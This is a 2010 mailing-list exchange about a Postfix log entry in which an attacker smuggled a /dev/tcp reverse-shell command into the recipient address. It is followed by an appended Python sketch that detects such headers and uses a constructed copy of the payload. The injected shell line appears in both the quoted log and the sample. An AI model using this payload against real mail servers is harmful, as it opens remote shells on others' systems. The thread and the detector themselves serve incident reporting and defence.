Author: Mathew Newton
Date:
To: users
Subject: Re: [bitfolk] Security - not just SSH
Hi Alastair,
I received the very same e-mail, only a matter of minutes after yours. My
server is not listed as an MX for any domains hence it looks like the
exploit attempts were a follow-up to a sweeping port scan. No doubt other
Bitfolk VPSs received the same thing.
Mathew
On Thu, March 18, 2010 7:47 am, Alastair Sherringham wrote:
> The httpd are often mod_proxy or PHP/phpMyAdmin attempts (no PHP
> here), but an odd record in the Postfix log today was a little
> different:
>
> X-Original-To: "root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0
> 2>&0"
> Delivered-To: "root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0
> 2>&0"@calliope.bitfolk
> Received: from bluedick (debian01.vservers.at [194.106.206.7])
> by calliope (Postfix) with SMTP id F1B31DC001
> for <"root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0
> 2>&0">; Wed, 17 Mar 2010 22:53:13 +0000 (GMT)
> Message-Id: <20100317225313.F1B31DC001@calliope>
> Date: Wed, 17 Mar 2010 22:53:13 +0000 (GMT)
> From: blue@???
> To: undisclosed-recipients:;
>
>
> I assume some sort of attempt to break Postfix. This message was
> delivered to "root" mailbox (no content).
> Alastair Sherringham
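
A detection sketch for the kind of record quoted above, added here as an example and not part of the original messages: it unfolds the headers and flags recipient fields that carry a pipe, backtick, `$(` or a `/dev/tcp` redirection, extracting the callback host and port. The sample headers are constructed (documentation address 192.0.2.10) and the function names are hypothetical.

```python
import re

# Constructed sample modelled on the headers quoted above; 192.0.2.10 is a
# documentation address, and continuation lines are folded with a leading space.
SAMPLE = '''X-Original-To: "root+:|exec /bin/sh 0</dev/tcp/192.0.2.10/9991 1>&0
 2>&0"
Delivered-To: "root+:|exec /bin/sh 0</dev/tcp/192.0.2.10/9991 1>&0
 2>&0"@calliope.bitfolk
Message-Id: <20100317225313.F1B31DC001@calliope>
X-Original-To: alice@example.org
'''

RECIPIENT_HEADERS = {"x-original-to", "delivered-to", "to", "cc"}
# Characters that have no place in a recipient and start a shell command.
SHELL_META = re.compile(r"[|`]|\$\(")
# Bash pseudo-device used to open an outbound socket: /dev/tcp/<host>/<port>
DEV_TCP = re.compile(r"/dev/(?:tcp|udp)/([0-9A-Za-z.\-]+)/(\d+)")

def unfold(raw):
    """Join folded continuation lines (leading space or tab) onto their header."""
    headers = []
    for line in raw.splitlines():
        if line[:1] in (" ", "\t") and headers:
            headers[-1] += " " + line.strip()
        elif ":" in line:
            headers.append(line)
    return headers

def suspicious_recipients(raw):
    """Return one finding per recipient header that carries shell syntax."""
    findings = []
    for header in unfold(raw):
        name, _, value = header.partition(":")
        if name.strip().lower() not in RECIPIENT_HEADERS:
            continue
        callback = DEV_TCP.search(value)
        if callback or SHELL_META.search(value):
            findings.append({
                "header": name.strip(),
                "value": value.strip(),
                # Host and port the command would connect back to, if present.
                "callback": (callback.group(1), int(callback.group(2))) if callback else None,
            })
    return findings

if __name__ == "__main__":
    for finding in suspicious_recipients(SAMPLE):
        print(finding["header"], finding["callback"], finding["value"])
```

The callback pairs it reports are candidates for egress filtering and for searching other hosts' mail logs.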